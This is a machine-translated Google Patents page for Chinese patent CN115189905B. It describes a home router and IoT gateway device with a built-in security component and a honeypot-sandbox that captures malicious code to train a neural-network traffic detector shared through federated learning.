CN115189905B - Network communication and safety control integrated machine and working method thereof - Google Patents
Network communication and safety control integrated machine and working method thereof Download PDFInfo
- Publication number
- CN115189905B CN115189905B CN202210499337.6A CN202210499337A CN115189905B CN 115189905 B CN115189905 B CN 115189905B CN 202210499337 A CN202210499337 A CN 202210499337A CN 115189905 B CN115189905 B CN 115189905B
- Authority
- CN
- China
- Prior art keywords
- component
- communication
- sandbox
- honeypot
- internet
- Prior art date
- Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
- Active
Links
Images
Classifications
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/14—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
- H04L63/1441—Countermeasures against malicious traffic
- H04L63/1491—Countermeasures against malicious traffic using deception as countermeasure, e.g. honeypots, honeynets, decoys or entrapment
-
- G—PHYSICS
- G16—INFORMATION AND COMMUNICATION TECHNOLOGY [ICT] SPECIALLY ADAPTED FOR SPECIFIC APPLICATION FIELDS
- G16Y—INFORMATION AND COMMUNICATION TECHNOLOGY SPECIALLY ADAPTED FOR THE INTERNET OF THINGS [IoT]
- G16Y30/00—IoT infrastructure
- G16Y30/10—Security thereof
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L12/00—Data switching networks
- H04L12/28—Data switching networks characterised by path configuration, e.g. LAN [Local Area Networks] or WAN [Wide Area Networks]
- H04L12/46—Interconnection of networks
- H04L12/4633—Interconnection of networks using encapsulation techniques, e.g. tunneling
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/02—Network architectures or network communication protocols for network security for separating internal from external traffic, e.g. firewalls
- H04L63/0227—Filtering policies
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/14—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
- H04L63/1433—Vulnerability analysis
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L67/00—Network arrangements or protocols for supporting network services or applications
- H04L67/01—Protocols
- H04L67/12—Protocols specially adapted for proprietary or special-purpose networking environments, e.g. medical networks, sensor networks, networks in vehicles or remote metering networks
Abstract
The invention discloses a network communication and safety control integrated machine and a working method thereof.A local verification component receives data flowing into and flowing out of the integrated machine and forwards the data to a safety component, the safety component processes the data, and then a routing component forwards the data; the honeypot of the honeypot sandbox linkage assembly monitors a communication interface and captures malicious codes; interacting malicious codes with the honeypot sandbox linkage assembly; the honey tank sandbox linkage component analyzes the flow through the sandbox and sends the flow to the Internet of things gateway component for processing, and returns the processed return information of the Internet of things gateway component to an attacker; the honeypot sandbox linkage component analyzes the captured malicious codes, and trains the convolutional neural network by taking the software behaviors and the network behaviors as the labels of the malicious codes after extracting the software behaviors and the network behaviors; the safety component checks and accepts the trained network and checks and monitors the communication passing through the all-in-one machine through the trained convolutional neural network.
Description
Technical Field
The invention relates to the technical field of network communication and safety control, in particular to a network communication and safety control integrated machine and a working method thereof.
Background
The statements in this section merely relate to the background of the present disclosure and may not necessarily constitute prior art.
The 21 st century is a century of the rapid development of the internet, during which network rate, network bearing capacity, network service quality and other factors related to the network are rapidly developed, and great convenience is provided for people's life. But malicious code propagated by means of the network, which is generated during the rapid development of the network, seriously affects almost all roles participating in the internet. Network security has undoubtedly become the most significant problem at the time. Nevertheless, it is difficult for most home users to understand the current situation of network security, even if it is known how to solve it. Most users often deploy a common router in a home, where the router may be connected to some home internet of things gateway components and controlled by a separate internet of things gateway, and a large number of applications are installed in a terminal device held by the user. The inside of this common scenario faces some of the problems that are difficult to solve.
The current mainstream home router is often a NAT firewall, and a simpler network management and security component is added to the NAT firewall, so that when a user accesses the Internet through the thin device, the hidden danger in the network environment, such as blasting login or exploit for the router, is hardly perceived. And some users may deploy some more practical internet of things devices in the home, which may also present security problems themselves, which may be similar to those faced by routers. Meanwhile, the deployment of a large number of internet of things devices and the expansion of possible devices or functions in the future can lead users to purchase an internet of things gateway specially used for the internet of things devices for unified management, which increases the deployment difficulty of the home network and increases fault points in vain. Furthermore, applications installed in handsets used by users may also spread malicious code to home devices.
Disclosure of Invention
In order to solve the defects in the prior art, the invention provides a network communication and safety control integrated machine and a working method thereof; the multi-scenario comprehensive network communication and safety management and control integrated machine comprising the router, the internet of things gateway and the safety component is provided, all network requirements and connections of the network are uniformly and coordinately managed, and the advantage of connection to multiple devices and the advantage of wide deployment of manufacturer devices are utilized to provide a simple and easy-to-operate solution for the common multi-azimuth integration of users. The method not only solves the difficult problems that the user is unfamiliar and does not understand the network deployment, but also reduces the number of devices deployed by the user, reduces the fault points, and can also provide a mature and reliable safety solution for the user.
In a first aspect, the present invention provides a network communication and security management and control integrated machine;
network communication and safety control all-in-one include: a local verification component;
the local verification component is connected with the safety component;
the safety component is connected with the logic framework module;
the logic frame module is respectively connected with the user equipment component, the routing component, the Internet of things gateway component and the honeypot sandbox linkage component;
the safety component is respectively connected with the user equipment component, the routing component, the Internet of things gateway component and the honey tank sandbox linkage component;
The honeypot sandbox linkage assembly is connected with the honeypot, the sandbox and the data set assembly;
the user equipment component is in network communication with the routing component;
the routing component is in network communication with the Internet of things related component;
the Internet of things gateway component is connected with the honeypot sandbox linkage component.
In a second aspect, the invention provides a working method of a network communication and safety management and control integrated machine;
the working method of the network communication and safety control integrated machine comprises the following steps:
the logic framework module of the all-in-one machine is in communication connection with the safety component, the user equipment component, the routing component, the Internet of things related component and the honeypot sandbox linkage component to coordinate the working modes of the components;
the local verification component of the all-in-one machine receives data flowing into and flowing out of the all-in-one machine and forwards the data to the safety component, the safety component analyzes and processes the data, and then the routing component forwards the data;
the internet of things gateway component of the all-in-one machine is in network communication with the user equipment component;
the honeypot sandbox linkage assembly is exposed to an external network on the routing assembly, and the honeypot monitors a communication interface and captures malicious codes;
according to the analysis result of the safety component, interacting the malicious code with the honeypot sandbox linkage component;
In the process of interaction and sample capturing of the honeypot sandbox linkage assembly, the honeypot sandbox linkage assembly transmits traffic after analysis of the sandbox to the internet of things gateway assembly for processing, and returns the processed returned information of the internet of things gateway assembly to an attacker;
the honeypot sandbox linkage component analyzes the captured malicious codes, and trains the convolutional neural network by taking the software behaviors and the network behaviors as the labels of the malicious codes after extracting the software behaviors and the network behaviors;
the safety component is used for checking and accepting the trained convolutional neural network and checking and monitoring communication passing through the all-in-one machine through the trained convolutional neural network.
Compared with the prior art, the invention has the beneficial effects that:
(1) The invention provides an integrated machine device, which is integrated with a common household wireless router, a modem, an internet of things gateway, an enterprise-level IPS, a firewall and an AI security detection engine.
(2) The invention makes strict security level division and isolation among different components, different areas and different devices, and compared with the traditional security devices such as a firewall, the division of the invention is more detailed and comprehensive, and flexible security policy deployment and implementation are supported.
(3) The integrated machine equipment provided by the invention can be used for more flexibly and accurately checking and filtering network communication by combining a machine learning model on the basis of the traditional firewall and IPS, and can induce potential threats and known threats to users to honeypots, so that the attack behaviors are restrained, the asset safety of the user equipment is protected, and sufficient time and theoretical reference are provided for the users to take measures. Meanwhile, the built-in sandboxes can analyze the captured malicious codes, so that the adaptability to '0-day' loopholes is greatly improved.
(4) The integrated machine equipment provided by the invention can be widely deployed, the honeypot in the equipment can strengthen the self-simulation and capturing capacity by means of the real Internet of things equipment, the problem that the traditional enhanced learning honeypot cannot be widely deployed due to equipment deployment is solved, each equipment has the capacity, the operations of multi-point malicious code capturing, analysis, data desensitization, characteristic engineering and local training of a machine learning model can be realized by combining with the federal learning network of equipment manufacturers, and the fusion of the machine learning models of the whole network equipment is carried out, so that barriers among the processes are opened.
Drawings
The accompanying drawings, which are included to provide a further understanding of the invention and are incorporated in and constitute a part of this specification, illustrate embodiments of the invention and together with the description serve to explain the invention.
FIG. 1 is a diagram showing the connection relationship between internal components of an integrated machine according to the first embodiment;
FIG. 2 is an overall flow chart of the first embodiment;
FIG. 3 is a flowchart of a first deployment operation of the all-in-one device of the first embodiment;
FIG. 4 is a flowchart of the operation of interfacing a honeypot sandbox linkage assembly with a federal learning network in an all-in-one machine according to the first embodiment;
fig. 5 is a workflow diagram of an incoming outgoing flow operation for a all-in-one device security component of the first embodiment.
Detailed Description
It should be noted that the following detailed description is exemplary and is intended to provide further explanation of the invention. Unless defined otherwise, all technical and scientific terms used herein have the same meaning as commonly understood by one of ordinary skill in the art to which this invention belongs.
It is noted that the terminology used herein is for the purpose of describing particular embodiments only and is not intended to be limiting of exemplary embodiments according to the present invention. As used herein, unless the context clearly indicates otherwise, the singular forms also are intended to include the plural forms, and furthermore, it is to be understood that the terms "comprises" and "comprising" and any variations thereof are intended to cover non-exclusive inclusions, such as, for example, processes, methods, systems, products or devices that comprise a series of steps or units, are not necessarily limited to those steps or units that are expressly listed, but may include other steps or units that are not expressly listed or inherent to such processes, methods, products or devices.
Embodiments of the invention and features of the embodiments may be combined with each other without conflict.
All data acquisition in the embodiment is legal application of the data on the basis of meeting laws and regulations and agreements of users.
Example 1
The embodiment provides a network communication and safety control integrated machine;
as shown in fig. 1, the network communication and security management and control integrated machine includes: a local verification component;
the local verification component is connected with the safety component;
the safety component is connected with the logic framework module;
the logic frame module is respectively connected with the user equipment component, the routing component, the Internet of things gateway component and the honeypot sandbox linkage component;
the safety component is respectively connected with the user equipment component, the routing component, the Internet of things gateway component and the honey tank sandbox linkage component;
the honeypot sandbox linkage assembly is connected with the honeypot, the sandbox and the data set assembly;
the user equipment component is in network communication with the routing component;
the routing component is in network communication with the Internet of things related component;
the Internet of things gateway component is connected with the honeypot sandbox linkage component.
Further, the local verification component is composed of a grammar rule checker, a hash value checker, a version checker and a file format checker, and is used for checking whether the obtained rule base is completed, tampered and meets the local deployment requirement.
The rule base is preset by a manufacturer and comprises a plurality of capturing rules of known malicious traffic.
The local verification component firstly uses a hash value checker to check the hash value of the file and compares the hash value with a preset value, and when the hash value and the preset value are the same, the file is proved not to be tampered. The obtained rule base is then checked using a version checker to determine its version number, update date, and then the encoding rules are validated and notified to the file format checker. The file format checker checks whether the file format is correct or not, whether each data structure is correct or not, the data quantity and whether fusion with the local library can be performed or not according to the checked version information. After the checking is finished and the importable data is confirmed, the grammar rule checker analyzes and unpacks the data structure, and each piece of data contained in the data structure is taken out one by one, the grammar of the rule is checked, and finally imported into a local rule base.
Further, the safety component is used for checking all communication flowing through the all-in-one machine, protecting the safety of the all-in-one machine, and protecting the network safety of the all-in-one machine and the connecting equipment thereof in the modes of active intervention, passive defense and communication monitoring.
Whether active intervention or passive defense is based on communication interception, the intercepted communication is checked by using a rule base and a machine learning model, and measures are taken according to the check result.
Blocking matched threats directly is called passive defense. And forwarding the potential malicious threat to the honeypot sandbox linkage assembly for analysis, and taking measures according to analysis results, wherein the process is called active intervention.
Furthermore, the logic framework module provides standard working, interaction and input and output program interfaces for the security component, the user equipment component, the routing component, the Internet of things gateway component and the honeypot sandbox linkage component, and all the communication among the components is realized through the logic framework module.
The logic framework module provides a standard program interface for the components, so that the module can be maintained conveniently later, and new components can be added without changing the underlying hardware architecture.
Further, the user equipment component provides access services for the user terminal equipment in a wireless or wired manner, and the process and function of connecting to this component is not essentially different from that of connecting to a home router in the conventional sense. However, with a slight difference, this component only provides network access services and is not capable of data forwarding.
Further, the user equipment component is a component for maintaining and managing user equipment, and the user equipment refers to all terminal equipment possibly used by a user, such as a mobile phone, a tablet computer, a computer and the like.
The difference between the internet of things component and the user component is that the device connected with the user component is a device convenient for the user or directly managed by the user, while the device in the internet of things component is mainly an internet of things device, and the devices are not generally directly used by the user, but provide services to the outside, for example: television, refrigerator, fan, etc.
Furthermore, the routing component is a home router and is used for forwarding and receiving all data packets on the all-in-one machine, and has no essential difference with the three-layer switch in the working principle.
Further, the routing component is configured to forward data of the internal network of the user or translate NAT of network address to outside, forward external data or translate NAT of network address to inside, and forward data between inside.
Further, the internet of things gateway component is an internet of things gateway, and all internet of things devices are connected to the internet of things gateway in a wired or wireless mode and are managed by the internet of things gateway.
Further, the internet of things gateway component is responsible for maintaining and managing all accessed internet of things devices, and identifies and uses a matched internet of things special protocol to communicate with the internet of things device terminals.
Further, the honeypot sandbox linkage component is responsible for interacting with suspected malicious traffic in an attempt to trap malicious code involved in the interaction process. And then the captured malicious codes are sent to a sandbox for analysis, the sandbox builds an analysis environment suitable for the malicious codes according to the malicious code attributes, the analysis environment is used for acquiring malicious behaviors and malicious traffic generated in the malicious code operation process, and the traffic is used for training a machine learning model to enhance the recognition capability of the machine learning model.
Example two
The embodiment provides a working method of a network communication and safety control integrated machine;
as shown in fig. 2, the working method of the network communication and security management and control integrated machine includes:
s201: the logic framework module of the all-in-one machine is in communication connection with the safety component, the user equipment component, the routing component, the Internet of things related component and the honeypot sandbox linkage component to coordinate the working modes of the components;
s202: the local verification component of the all-in-one machine receives data flowing into and flowing out of the all-in-one machine and forwards the data to the safety component, the safety component analyzes and processes the data, and then the routing component forwards the data;
s203: the internet of things gateway component of the all-in-one machine is in network communication with the user equipment component;
S204: the honeypot sandbox linkage assembly is exposed to an external network on the routing assembly, and the honeypot monitors a communication interface and captures malicious codes;
s205: according to the analysis result of the safety component, interacting the malicious code with the honeypot sandbox linkage component;
s206: in the process of interaction and sample capturing of the honeypot sandbox linkage assembly, the honeypot sandbox linkage assembly transmits traffic after analysis of the sandbox to the internet of things gateway assembly for processing, and returns the processed returned information of the internet of things gateway assembly to an attacker;
s207: the honeypot sandbox linkage component analyzes the captured malicious codes, and trains the convolutional neural network by taking the software behaviors and the network behaviors as the labels of the malicious codes after extracting the software behaviors and the network behaviors;
s208: the safety component is used for checking and accepting the trained convolutional neural network and checking and monitoring communication passing through the all-in-one machine through the trained convolutional neural network.
Further, as shown in fig. 3, specific steps of the first deployment operation flow of the integrated device include:
the method comprises the steps of starting the integrated machine for the first time, loading firmware for the first time, and reading information of user terminal equipment connected to the registered integrated machine;
The device is connected to the integrated machine through a configuration interface and completes configuration of the device and the basic network under the guidance course;
reading and registering user Internet of things equipment, and constructing a home Internet of things environment on a network level;
communication is carried out with the Internet of things equipment, and the user is helped to configure the Internet of things equipment at a configuration level according to the authorization mode of the user;
judging whether an additional equipment data request is acquired or not; if yes, returning to the step of reading and registering the user Internet of things equipment; if not, the device security module is used for carrying out security check on the network environment and the device in combination with the built-in strategy.
Further, the logic framework module of the all-in-one machine obtains a rule base which is constructed in advance by the all-in-one machine manufacturer and used for identifying malicious codes from a remote server of the all-in-one machine manufacturer, and simultaneously obtains a machine learning model from a federal learning network.
Further, the step S201: the logic framework module of the all-in-one machine is in communication connection with the safety component, the user equipment component, the routing component, the Internet of things related component and the honeypot sandbox linkage component to coordinate the working modes of the components; the method specifically comprises the following steps:
s2011: the logic framework module of the all-in-one machine is in communication connection with the safety component, the user equipment component, the routing component, the Internet of things gateway component and the honeypot sandbox linkage component;
S2012: the security component is in butt joint with the routing component;
s2013: the security component is in butt joint with the Internet of things related component and the user equipment component;
s2014: the honey tank sandbox linkage assembly is in butt joint with the safety assembly and the Internet of things gateway assembly;
s2015: the Internet of things gateway component and the user equipment component are in butt joint with the routing component in terms of network communication;
s2016: after the integrated machine acquires the rule information, the local verification component is used for carrying out integrity verification on the rule information; and checking the current machine learning model version and iteration condition by using the model iteration blockchain information in the federal learning network.
Further, S2012: the security component is in butt joint with the routing component; the method specifically comprises the following steps:
the safety component is logically positioned at a bypass of the routing component, and bypass communication is used as default, when the safety component fails, the self working mode is switched into bypass mode in time, so that communication skips the safety component to ensure normal communication of users and devices thereof.
Further, the S2013: the security component is in butt joint with the Internet of things related component and the user equipment component; the method specifically comprises the following steps:
the safety component is in butt joint with the Internet of things gateway component and the user equipment component in a side hanging mode, communication entering and exiting the Internet of things gateway component and the user equipment component is redirected to the safety component for analysis and evaluation, then the next forwarding operation is continued, and meanwhile, a bypass mode is supported when the safety component fails. In addition, when the security component works normally, network device level isolation is carried out on the device with abnormality and the routing component.
Further, the S2014: the honey tank sandbox linkage assembly is in butt joint with the safety assembly and the Internet of things gateway assembly; the method specifically comprises the following steps:
the honey tank sandbox linkage assembly timely bypasses communication according to the requirement of the safety assembly, analyzes and monitors normal communication, and induces and analyzes attack communication; in the analysis process, the honeypot sandbox linkage assembly uses real Internet of things equipment in the Internet of things gateway assembly to improve the simulation and malicious code capturing capacity of the honeypot sandbox linkage assembly, and in the analysis process, the honeypot sandbox linkage assembly further comprises the step of pre-analyzing instructions sent to the real Internet of things equipment.
Further, the S2015: the Internet of things gateway component and the user equipment component are in butt joint with the routing component in terms of network communication; the method specifically comprises the following steps:
enabling data flowing into and out of the gateway component and the user equipment component to be properly handled by the routing component:
for communication needing to interact with an external network, a routing component maintains an NAT forwarding table (IPv 4 NAT), an IP address corresponding relation (IPv 4 and IPv6 dual stack) and a session mapping table (session initiation direction, session parties, time and the like);
for the communication in the components, a LAN communication mode or a VLAN forwarding mode is used;
For communication between components, an inter-component communication mapping table (session direction, both parties to the session, session components, time, etc.) is maintained.
Further, the S2016 includes: the integrated machine equipment manufacturer or the community maintenance safety component stores rule information which can be used by a rule base and acquires the latest machine learning model from the federal learning network.
The federal learning network: federal learning networks established and maintained by all-in-one equipment vendors. And the federal learning network receives relevant data and information of all the machine learning models of the all the integrated machines authorized by the users, performs federal learning training and model fusion on all the received machine learning models, and finally obtains the machine learning models from federal learning fusion. And in the process of carrying out iterative updating of the model, the block chain is used for recording the iterative updating process and information each time, so that the analysis of iteration and evolution of the manufacturer analysis model can be carried out, and the integrated machine can also be used for checking and verifying the acquired machine learning model.
Further, the S2011: the logic framework module of the all-in-one machine is in communication connection with the safety component, the user equipment component, the routing component, the Internet of things gateway component and the honeypot sandbox linkage component; the method specifically comprises the following steps:
S20111: the logic framework module of the all-in-one machine establishes a network communication relationship with the routing component;
s20112: the logic framework module of the all-in-one machine establishes a network communication and security management relationship with the security component;
s20113: the logic frame module of the integrated machine establishes a network communication and software behavior management relationship with the honeypot sandbox linkage assembly, and coordinates the network communication and software behavior management relationship with the safety assembly for butt joint;
s20114: the logic framework module of the all-in-one machine and the Internet of things related component establish a network communication and equipment management relationship;
s20115: the logic framework module of the all-in-one machine establishes a network communication and equipment management relationship with the user equipment component.
Further, the S20111: the logic framework module of the all-in-one machine establishes a network communication relationship with the routing component; the method specifically comprises the following steps:
the logic frame module of the all-in-one machine establishes a network communication relation with the routing component, and enables the routing component to route and exchange all network communication entering and exiting the all-in-one machine, maintains interfaces on the abutting operation of the all-in-one machine, and realizes the centralized management of interfaces of abutting users, interfaces of abutting Internet of things equipment, interfaces of abutting wireless Access equipment and wireless Access Points (APs). Maintaining global routing tables, address resolution protocol (ARP, address Resolution Protocol) tables, MAC address mapping and forwarding tables, network address translation (NAT, network Address Translation) forwarding tables, port mapping tables, etc., while being responsible for dynamic host configuration protocols (DHCP, dynamic Host Configuration Protocol) DHCP, domain name system (DNS, domain Name System) etc. users accessing network common services, router designated areas, etc.
Further, the S20112: the logic framework module of the all-in-one machine establishes a network communication and security management relationship with the security component; the method specifically comprises the following steps:
the logical framework module of the all-in-one establishes network communication and security management relationships with the security component and enables the security component to inspect and monitor all communications passing through the routing component (outgoing and outgoing internal network communications and internal network cross-direction communications) while coordinating interfacing with the routing component.
Further, the S20114: the logic framework module of the all-in-one machine and the Internet of things related component establish a network communication and equipment management relationship; the method specifically comprises the following steps:
the logic frame module of the all-in-one machine establishes a network communication and equipment management relationship with the Internet of things gateway component, so that the Internet of things gateway component is responsible for controlling and centralized communication management of all Internet of things equipment in the whole domain, and is in butt joint with the logic frame module of the all-in-one machine in terms of equipment management, receives user control signaling and coordinates and carries out butt joint with the routing component.
Further, the S20115: the logic framework module of the all-in-one machine establishes a network communication and equipment management relationship with the user equipment component; the method specifically comprises the following steps:
the logic frame module of the all-in-one machine establishes a network communication and equipment management relationship with the user equipment assembly, so that the user equipment assembly maintains the equipment states of all normal internet users, and the logic frame module of the all-in-one machine is docked in the aspect of equipment management, thereby allowing the users to perform operations such as connection, configuration, management and the like on the all-in-one machine. While coordinating interfacing with the routing component.
Further, the step S202: the local verification component of the all-in-one machine receives data flowing into and flowing out of the all-in-one machine and forwards the data to the safety component, the safety component analyzes and processes the data, and then the routing component forwards the data; the method specifically comprises the following steps:
s2021: checking whether the communication is in a security event cache table, if so, processing according to the operation in the security event cache table;
s2022: processing a data packet in communication, respectively extracting header information and application layer data of a data link layer, a network layer and a transmission layer, and comparing the header information by using rules stored in a rule base; matching the extracted data with the contents in the rule base piece by piece and matching the extracted data piece by piece, if the extracted data accords with the contents described in the rule base, if the extracted data is hit, continuing to match downwards;
s2023: performing application layer content inspection on the data packet passing the rule base inspection; ignoring the ciphertext, and matching rules of the plaintext data of the application layer of the rule base with the plaintext; wherein the application layer content comprises: an application layer protocol and content transmitted by the application layer;
s2024: the method comprises the steps of performing proportional dense sampling operation and logging on a communication process by using Netflow, checking communication sampling data by using a machine learning model in a safety component, and checking a sampling log by using a log checking mode;
S2025: when the security component encounters an abnormal condition or security event, a security event cache table in the security component is updated.
Each rule in the rule base describes a feature of a communication, such as MAC, IP, port, transport layer protocol, application layer protocol, and application layer content, for example, to describe the feature of a malicious communication. To record a wide variety of features, each "rule" uses a unified and formatted data structure, and a database of rules from one rule to another is referred to as a "rule base".
Operations in the security event cache table include forwarding, discarding, suppressing, spoofing, active intervention, monitoring, tracking, resetting.
And (3) forwarding: forwarding the data packet;
discarding: discarding the data packet;
inhibition: limiting the number of forwarding data packets in unit time;
spoofing: transmitting the erroneous content to the source or destination;
active intervention: attempting to transfer communications to and interact with the honeypot sandboxed linkage assembly;
and (3) monitoring: monitoring communications from the flow layer plane (data link layer, network layer, transport layer);
tracking: monitoring from the level of forwarding content (transport payload, including transport layer, application layer);
resetting: resetting an established protocol connection using a reset identity of the protocol;
The security event cache table is used for security check cache of the security component, and particularly aims at malicious communication detected by the machine learning model. The method comprises the steps of source IP, destination IP, source port, destination port, transport layer protocol number, creation event, last hit time, maximum survival time, communication direction, scope, operation type, operation, event number, diagnosis mode and state. The method is used for describing a communication occurrence time occurrence area, a port name, a protocol type, a communication mode, a triggered detection engine, a solution measure, an event entry creation time, an event entry removal time and an event current validity.
NetFlow, a network protocol developed by cisco, is used to monitor networks.
Further, the step S203: the internet of things gateway component of the all-in-one machine is in network communication with the user equipment component; the method specifically comprises the following steps:
s2031: dividing the equipment in the gateway of the Internet of things into a plurality of equipment groups according to the equipment types and actions, and not checking the communication of the equipment in the equipment groups;
s2032: when the safety component checks the communication, firstly extracting the communication information and matching the safety event cache table, and if the communication information hits an item in the table, directly executing according to the operation recorded in the table, so that the follow-up check is skipped to improve the performance of the safety component;
S2033: when communication is carried out among different equipment groups in the gateway component of the Internet of things, the communication firstly passes through the gateway component of the Internet of things, the gateway component of the Internet of things only carries out sparse sampling record on the communication and carries out communication log inspection by using the security component, no additional security inspection is carried out, and communication limitation is carried out on equipment with abnormal log inspection and report is carried out;
s2034: the equipment in the user equipment group does not use grouping management, when the user equipment initiates access to the user equipment assembly, interaction among each equipment passes through the user equipment assembly, sparse sampling is conducted on communication by combining with the security assembly, communication log inspection is conducted, additional security inspection is not conducted, communication limitation is conducted on equipment with abnormal log inspection, and reporting is conducted;
s2035: the communication process between the Internet of things gateway component and the user equipment component is maintained by using an inter-component communication mapping table, all transverse communication among the components is recorded in the inter-component communication mapping table, meanwhile, the aging time is set to be the protocol communication time plus t minutes under the default condition, and entries exceeding the aging time are removed from the table; t is a positive integer; for example, t=1;
s2036: under the default condition, the security level of the gateway component of the Internet of things is higher than that of the user equipment component, when the Internet of things equipment initiates interaction to the user equipment (high security level access low security level) component, only sparse sampling is carried out on communication, a machine learning model is used for checking, abnormal communication is blocked and reported, and meanwhile communication of corresponding equipment is limited; when the user equipment component initiates interaction to the Internet of things gateway component (low security level accesses to high security level), densely sampling communication and checking by using a machine learning model, blocking abnormal communication, blocking and reporting related equipment;
S2037: when the security component encounters an abnormal condition or security event, a security event cache table in the security component is updated.
User equipment group representation: all devices connected to the user equipment assembly. I.e. all user terminals such as mobile phones, tablets, etc.
Further, the S2031: dividing the equipment in the gateway of the Internet of things into a plurality of equipment groups according to the equipment types and actions, and not checking the communication of the equipment in the equipment groups; the method specifically comprises the following steps:
the equipment in the gateway component of the Internet of things is divided into a plurality of equipment groups according to the equipment types and the functions, and the internal equipment of the equipment groups is not directly communicated but passes through the gateway component of the Internet of things, but the gateway component of the Internet of things does not conduct any examination on the communication and directly forwards the communication.
Grouping according to the functional characteristics of the devices, such as devices (smart locks, safes, etc.) that are able to collect the biological information of the user, concerning privacy; the device capable of collecting user privacy (voice control device, camera, electronic cat eye and the like), providing basic service, other devices (air conditioner, refrigerator and the like) and remote control devices (intelligent curtain and the like).
Meanwhile, the all-in-one equipment allows a user to define equipment classification, and the user can divide the equipment which the user thinks should form a group into groups.
Further, the step S204: the honeypot sandbox linkage assembly is exposed to an external network on the routing assembly, and the honeypot monitors a communication interface and captures malicious codes; the method specifically comprises the following steps:
s2041: all communication of the honeypot sandbox linkage assembly is realized through a routing assembly, and the routing assembly exposes the honeypot sandbox linkage assembly to an external network in a DMZ (digital media player) mode;
s2042: carrying out security policy configuration on a DMZ area where the honey pot sandbox linkage assembly is located in the security assembly;
s2043: the honeypot sandbox linkage component applies for and requires the routing component to open the listening interface in a low priority form and capture malicious code using the listening interface.
DMZ, demilitarized Zone, demilitarized management area, represents devices in the network that are fully exposed on the internet in an in-and-out network isolated environment.
Further, the S2042: carrying out security policy configuration on a DMZ area where the honey pot sandbox linkage assembly is located in the security assembly; the method specifically comprises the following steps:
s20421: configuring the DMZ zone does not allow active access to any other component using a non-proprietary protocol, and the honeypot sandboxed linked component in the DMZ zone does not allow any information to be passed out to other components using a non-proprietary protocol; the special protocol refers to an end-to-end tunneling protocol, which is designed and implemented by equipment manufacturers;
S20422: configuring the user equipment component and the internet of things related component not to allow the DMZ zone to be actively accessed in any way and with any protocol;
s20423: the DMZ area is configured to actively initiate communication to the Internet of things gateway component by using a special protocol, and the communication is controlled by the honeypot sandbox linkage component and registered with the security component; the security component adds devices that communicate with the DMZ zone to the DMZ communication group, reducing the security level of the devices that communicate with the DMZ zone to a minimum, severely restricting the communication of the DMZ communication group with other components or devices.
In order to enable honeypots to utilize devices in the internet of things to enhance trapping capabilities while being able to explicitly identify these communication traffic, special protocols have therefore been proposed.
The dedicated protocol is used for providing an end-to-end tunnel, namely a tunnel between the honeypot and the internet of things component, and the tunnel can encapsulate the original internet of things protocol as a load in the tunnel.
Further, the S2043: the honeypot sandbox linkage component applies for and requires the routing component to open a monitoring interface in a low-priority mode, and captures malicious codes by using the monitoring interface; the method specifically comprises the following steps:
s20431: the routing component maps and exposes all transmission layer ports of the routing component with low priority, and registers and marks in the NAT forwarding table;
S20432: when the internal network initiates communication to the external network, the routing component checks whether the current communication appears in the NAT forwarding table, if so, forwarding is carried out according to the NAT forwarding table, otherwise, the low-priority port mapping entry of the corresponding port is cancelled and the current communication mapping is added;
s20433: when receiving the communication of the external network, the routing component firstly checks whether a corresponding entry exists in the NAT forwarding table, if so, forwarding is carried out according to the NAT forwarding table, otherwise, low-priority port mapping is matched, and the current communication is transmitted to the honeypot sandbox linkage component in the DMZ area for processing;
s20434: and when the normal priority mapping passes the aging time of the NAT forwarding table and no subsequent communication is performed, deleting the normal priority mapping from the NAT forwarding table, and automatically converting the normal priority mapping into a low priority port mapping. The low priority port mapping is not affected by the NAT forwarding table aging mechanism, and the existence time is positive infinity.
Further, the step S205: according to the analysis result of the safety component, interacting the malicious code with the honeypot sandbox linkage component; the method specifically comprises the following steps:
s2051: for the traffic checked by S2022 and S2023, maintaining a session mapping table and forwarding continuously by the routing component;
S2052: for the traffic which does not pass the inspection and is explicitly marked as malicious, immediately taking measures and inducing communication to the honeypot sandbox linkage assembly;
s2053: for traffic which does not pass the inspection but cannot be clearly malicious, blocking and recording are firstly carried out in a security event cache table, meanwhile, communication is induced to a honeypot sandbox linkage assembly to achieve the purposes of attracting and restraining attacks, if the previous analysis result can be eliminated after detection, the traffic is marked in the security event cache table, meanwhile, communication limitation is relieved, meanwhile, the marked communication is closely monitored and tracked for a period of time, and once high-risk network communication or communication with sensitive equipment and resources is discovered, blocking is carried out timely.
Further, as shown in fig. 4 and 5, the step S2052: for traffic that does not pass the inspection and is explicitly marked as malicious, immediately taking measures and inducing the communication to the honeypot sandbox linkage assembly; the method specifically comprises the following steps:
s20521: when malicious communication is found in communication of an incoming network, the security component informs the honeypot sandbox linkage component of preparing to take over the malicious communication and monitoring the malicious communication, simultaneously immediately blocks communication with internal equipment, and adds an entry in a security event cache table in the security component for recording the inspection result;
S20522: if the malicious code is captured, the malicious code sample is sent to a sandbox for analysis, and meanwhile, a threat is reported to a user; if the malicious codes are not captured, recording an interaction process, desensitizing the data related to privacy and reporting current interaction information to a manufacturer server, and simultaneously notifying a user of the threat discovery;
s20523: when the internal equipment is found to send abnormal traffic to the outside in the communication of the outgoing network, a notice or an alarm is sent to a user, if high-risk behaviors or network communication are found, the communication is blocked, and meanwhile, communication isolation is carried out on the related equipment, so that malicious threats in the communication isolation equipment are difficult to spread to other equipment and alarm to the user;
